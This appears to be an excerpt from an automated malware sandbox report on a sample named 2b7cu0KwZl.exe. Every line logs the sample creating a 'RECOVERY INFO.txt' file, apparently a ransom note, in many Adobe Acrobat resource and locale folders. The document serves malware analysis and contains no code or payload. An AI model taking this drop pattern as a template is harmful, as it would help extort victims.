Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\ccpdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\themeless\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
